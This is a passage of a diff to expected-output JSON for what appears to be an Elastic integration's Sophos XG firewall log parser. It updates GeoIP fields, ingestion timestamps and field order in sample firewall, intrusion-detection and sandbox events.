dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010102600002", "kind": "event", @@ -5775,19 +5530,14 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 3389, @@ -5863,7 +5613,7 @@ "event": { "duration": 0, "severity": 4, - "ingested": "2021-12-09T13:44:55.715436600Z", + "ingested": "2021-12-14T14:54:45.179854203Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:43 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010402403001 log_type=\"Firewall\" log_component=\"DoS Attack\" log_subtype=\"Denied\" status=\"Deny\" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"\" src_mac=34:db:fd:83:d8:09 src_ip=175.16.199.1 src_country_code=\"\" dst_ip=10.84.234.14 dst_country_code=\"\" protocol=\"UDP\" src_port=3389 dst_port=64465 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010402403001", "kind": "alert", @@ -5982,7 +5732,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715442500Z", + "ingested": "2021-12-14T14:54:45.179854564Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:44 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=012802605201 log_type=\"Firewall\" log_component=\"SSL VPN\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"tun0\" out_interface=\"\" src_mac=\"\" src_ip=10.82.234.9 src_country_code=\"\" dst_ip=10.82.234.11 dst_country_code=\"\" protocol=\"TCP\" src_port=58331 dst_port=56267 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "012802605201", "kind": "event", @@ -6018,25 +5768,20 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "ruleset": "2", @@ -6140,7 +5885,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715448300Z", + "ingested": "2021-12-14T14:54:45.179854936Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:45 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=0 fw_rule_id=61 policy_type=2 user_name=\"elastic@user.local\" user_gp=\"elastic.group.local\" iap=0 ips_policy_id=11 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"ipsec0\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=10.84.234.7 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=R1 protocol=\"TCP\" src_port=58543 dst_port=443 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"VPN\" srczone=\"VPN\" dstzonetype=\"VPN\" dstzone=\"VPN\" dir_disp=\"\" connevent=\"Start\" connid=\"1615935064\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010101600001", "kind": "event", @@ -6176,19 +5921,14 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 0, @@ -6278,7 +6018,7 @@ "event": { "duration": 0, "severity": 5, - "ingested": "2021-12-09T13:44:55.715454200Z", + "ingested": "2021-12-14T14:54:45.179855312Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:45 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=018201500005 log_type=\"Firewall\" log_component=\"ICMP ERROR MESSAGE\" log_subtype=\"Allowed\" status=\"Allow\" priority=Notice duration=0 fw_rule_id=60 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=17 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"\" src_mac=34:db:fd:83:d8:09 src_ip=192.168.1.254 src_country_code=\"\" dst_ip=175.16.199.1 dst_country_code=\"\" protocol=\"ICMP\" icmp_type=3 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connevent=\"Interim\" connid=\"2685668438\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "018201500005", "kind": "event", @@ -6309,19 +6049,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 88, @@ -6339,19 +6074,14 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 61925, @@ -6436,7 +6166,7 @@ "event": { "duration": 10000000000, "severity": 6, - "ingested": "2021-12-09T13:44:55.715460200Z", + "ingested": "2021-12-14T14:54:45.179855770Z", "original": "device=\"SFW\" date=2020-06-05 time=12:38:53 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=10 fw_rule_id=60 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=17 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"ipsec0\" out_interface=\"Port1\" src_mac=00:00:00:00:00:00 src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=R1 protocol=\"TCP\" src_port=61925 dst_port=88 sent_pkts=6 recv_pkts=6 sent_bytes=1802 recv_bytes=1732 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0srczonetype=\"VPN\" srczone=\"VPN\" dstzonetype=\"LAN\" dstzone=\"LAN\" dir_disp=\"\" connevent=\"Stop\" connid=\"1617126256\" vconnid=\"\" hb_health=\"NoHeartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0\"", "code": "010101600001", "kind": "event", @@ -6473,25 +6203,20 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 0, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "ruleset": "0", @@ -6567,7 +6292,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715466Z", + "ingested": "2021-12-14T14:54:45.179856141Z", "original": "device=\"SFW\" date=2018-05-30 time=13:26:37 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010202601001 log_type=\"Firewall\" log_component=\"Invalid Traffic\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=10.198.32.19 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol=\"UDP\" src_port=1353 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"Invalid UDP destination.\" appresolvedby=\" Signature\"", "code": "010202601001", "kind": "event", @@ -6678,7 +6403,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715471900Z", + "ingested": "2021-12-14T14:54:45.179856523Z", "original": "device=\"SFW\" date=2018-06-04 time=17:20:24 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=011402601301 log_type=\"Firewall\" log_component=\"Fragmented Traffic\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=0.0.0.0 src_country_code= dst_ip=0.0.0.0 dst_country_code= protocol=\"0\" src_port=0 dst_port=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\"", "code": "011402601301", "kind": "event", @@ -6797,7 +6522,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715564300Z", + "ingested": "2021-12-14T14:54:45.179856909Z", "original": "device=\"SFW\" date=2018-05-30 time=14:01:32 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010302602002 log_type=\"Firewall\" log_component=\"Appliance Access\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=2 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port2.611\" out_interface=\"\" src_mac=c8:5b:76:ab:72:d3 src_ip=10.198.38.184 src_country_code= dst_ip=10.198.39.255 dst_country_code= protocol=\"UDP\" src_port=137 dst_port=137 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\"", "code": "010302602002", "kind": "event", @@ -6916,7 +6641,7 @@ "event": { "duration": 0, "severity": 4, - "ingested": "2021-12-09T13:44:55.715571Z", + "ingested": "2021-12-14T14:54:45.179859074Z", "original": "device=\"SFW\" date=2018-05-30 time=14:17:17 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010402403001 log_type=\"Firewall\" log_component=\"DoS Attack\" log_subtype=\"Denied\" status=\"Deny\" priority=Warning duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"\" src_mac=b8:97:5a:5b:0f:fd src_ip=10.198.32.19 src_country_code= dst_ip=10.198.32.48 dst_country_code= protocol=\"TCP\" src_port=41960 dst_port=22 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\" Signature\"", "code": "010402403001", "kind": "alert", @@ -7027,7 +6752,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715577Z", + "ingested": "2021-12-14T14:54:45.179859554Z", "original": "device=\"SFW\" date=2018-06-05 time=14:30:31 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010502604001 log_type=\"Firewall\" log_component=\"ICMP Redirection\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=10.198.37.23 src_country_code= dst_ip=10.198.36.48 dst_country_code= protocol=\"ICMP\" icmp_type=5 icmp_code=1 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\" Signature\"", "code": "010502604001", "kind": "event", @@ -7063,25 +6788,20 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "ruleset": "1", @@ -7156,7 +6876,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715583100Z", + "ingested": "2021-12-14T14:54:45.179859925Z", "original": "device=\"SFW\" date=2018-05-31 time=17:05:14 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=010602605001 log_type=\"Firewall\" log_component=\"Source Routed\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=1 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"\" out_interface=\"\" src_mac= src_ip=10.198.12.19 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol=\"TCP\" src_port=1571 dst_port=80 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\"", "code": "010602605001", "kind": "alert", @@ -7276,7 +6996,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715589Z", + "ingested": "2021-12-14T14:54:45.179860298Z", "original": "device=\"SFW\" date=2018-05-30 time=15:09:51 timezone=\"IST\" device_name=\"XG125w\" device_id=SFDemo-763180a log_id=011702605051 log_type=\"Firewall\" log_component=\"MAC Filter\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=0 policy_type=0 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port2.531\" out_interface=\"\" src_mac=1e:3a:5a:5b:23:ab src_ip=fe80::59f5:3ce8:c98e:5062 src_country_code= dst_ip=ff02::1:2 dst_country_code= protocol=\"UDP\" src_port=546 dst_port=547 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\"", "code": "011702605051", "kind": "event", @@ -7394,7 +7114,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715594900Z", + "ingested": "2021-12-14T14:54:45.179860667Z", "original": "device=\"SFW\" date=2018-06-01 time=10:57:55 timezone=\"BST\" device_name=\"XG310\" device_id=SFDemo-9a04c43 log_id=016602600006 log_type=\"Firewall\" log_component=\"Heartbeat\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name=\"\" user_gp=\"\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port3.611\" out_interface=\"\" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=10.198.32.19 dst_country_code= protocol=\"ICMP\" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"Red\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "016602600006", "kind": "event", @@ -7429,19 +7149,14 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "bytes": 0, @@ -7529,7 +7244,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715600800Z", + "ingested": "2021-12-14T14:54:45.179861109Z", "original": "device=\"SFW\" date=2018-06-01 time=10:55:41 timezone=\"BST\" device_name=\"XG310\" device_id=SFDemo-9a04c43 log_id=016602600003 log_type=\"Firewall\" log_component=\"Heartbeat\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=16 policy_type=1 user_name=\"\" user_gp=\"\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port3.611\" out_interface=\"\" src_mac=08:00:27:4c:49:e3 src_ip=10.198.37.57 src_country_code= dst_ip=175.16.199.1 dst_country_code= protocol=\"ICMP\" icmp_type=8 icmp_code=0 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip= tran_src_port=0 tran_dst_ip= tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"Red\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "016602600003", "kind": "alert", @@ -7558,19 +7273,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, @@ -7584,19 +7294,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 41528, @@ -7654,7 +7359,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.715606900Z", + "ingested": "2021-12-14T14:54:45.179861538Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:54 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name=\"\" signature_id=1881 signature_msg=\"SERVER-WEBAPP bad HTTP 1.1 request - potential worm attack\" classification=\"access to a potentially vulnerable web application\" rule_priority=2 src_ip=175.16.199.1 src_country_code=ROU dst_ip=175.16.199.1 dst_country_code=R1 protocol=\"TCP\" src_port=41528 dst_port=80 platform=\"BSD,Linux,Mac,Other,Solaris,Unix,Windows\" category=\"server-webapp\" target=\"Server\"", "code": "020804407002", "kind": "alert", @@ -7681,19 +7386,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, @@ -7707,19 +7407,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 58914, @@ -7777,7 +7472,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.715612800Z", + "ingested": "2021-12-14T14:54:45.179861913Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:55 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=23 user_name=\"\" signature_id=1616 signature_msg=\"PROTOCOL-DNS named version attempt\" classification=\"Attempted Information Leak\" rule_priority=1 src_ip=175.16.199.1 src_country_code=CHN dst_ip=175.16.199.1 dst_country_code=R1 protocol=\"UDP\" src_port=58914 dst_port=53 platform=\"BSD,Linux,Mac,Other,Solaris,Unix,Windows\" category=\"protocol-dns\" target=\"Server\"", "code": "020804407002", "kind": "alert", @@ -7804,19 +7499,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, @@ -7830,19 +7520,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 59476, @@ -7900,7 +7585,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.715618700Z", + "ingested": "2021-12-14T14:54:45.179862312Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:56 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=020804407002 log_type=\"IDP\" log_component=\"Signatures\" log_subtype=\"Drop\" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name=\"\" signature_id=53589 signature_msg=\"SERVER-WEBAPP DrayTek multiple products command injection attempt\" classification=\"Web Application Attack\" rule_priority=2 src_ip=175.16.199.1 src_country_code=NLD dst_ip=175.16.199.1 dst_country_code=R1 protocol=\"TCP\" src_port=59476 dst_port=80 platform=\"Linux,Mac,Other,Unix,Windows\" category=\"server-webapp\" target=\"Server\"", "code": "020804407002", "kind": "alert", @@ -7990,7 +7675,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.715625100Z", + "ingested": "2021-12-14T14:54:45.179862865Z", "original": "device=\"SFW\" date=2018-05-23 time=16:20:34 timezone=\"BST\" device_name=\"XG750\" device_id=SFDemo-f64dd6be log_id=020703406001 log_type=\"IDP\" log_component=\"Anomaly\" log_subtype=\"Detect\" priority=Warning idp_policy_id=1 fw_rule_id=2 user_name=\"\" signature_id=26022 signature_msg=\"FILE-PDF EmbeddedFile contained within a PDF\" classification=\"A Network Trojan was detected\" rule_priority=1 src_ip=10.0.0.168 src_country_code=R1 dst_ip=10.1.1.234 dst_country_code=R1 protocol=\"TCP\" src_port=28938 dst_port=25 platform=\"Windows\" category=\"Malware Communication\" target=\"Server\"", "code": "020703406001", "kind": "alert", @@ -8080,7 +7765,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.715631100Z", + "ingested": "2021-12-14T14:54:45.179863239Z", "original": "device=\"SFW\" date=2018-05-23 time=16:16:43 timezone=\"BST\" device_name=\"XG750\" device_id=SFDemo-f64dd6be log_id=020704406002 log_type=\"IDP\" log_component=\"Anomaly\" log_subtype=\"Drop\" priority=Warning idp_policy_id=1 fw_rule_id=2 user_name=\"\" signature_id=26022 signature_msg=\"FILE-PDF EmbeddedFile contained within a PDF\" classification=\"A Network Trojan was detected\" rule_priority=1 src_ip=10.0.1.31 src_country_code=R1 dst_ip=10.1.0.115 dst_country_code=R1 protocol=\"TCP\" src_port=40140 dst_port=25 platform=\"Windows\" category=\"Malware Communication\" target=\"Server\"", "code": "020704406002", "kind": "alert", @@ -8097,12 +7782,6 @@ } }, { - "log": { - "level": "informational" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "XG", "serial_number": "C44310050024-P29PUA", @@ -8121,6 +7800,9 @@ "defaulttest.local" ] }, + "log": { + "level": "informational" + }, "sophos": { "xg": { "reason": "eligible", @@ -8138,7 +7820,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715637200Z", + "ingested": "2021-12-14T14:54:45.179863621Z", "original": "device=\"SFW\" date=2017-01-31 time=14:52:11 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=138301618041 log_type=\"Sandbox\" log_component=\"Mail\" log_subtype=\"Allowed\" priority=Information user_name=\"\" src_ip= filename=\"\" filetype=\"\" filesize=0 sha1sum=\"\" source=\"\" reason=\"eligible\" destination=\"\" subject=\"\"", "code": "138301618041", "kind": "event", @@ -8152,7 +7834,10 @@ "connection" ], "outcome": "success" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -8220,7 +7905,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:55.715643Z", + "ingested": "2021-12-14T14:54:45.179863985Z", "original": "device=\"SFW\" date=2017-01-31 time=14:52:11 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44310050024-P29PUA log_id=138302218042 log_type=\"Sandbox\" log_component=\"Mail\" log_subtype=\"Denied\" priority=Critical user_name=\"jsmith@iview.com\" src_ip=10.198.47.112 filename=\"1.exe\" filetype=\"application/octet-stream\" filesize=153006 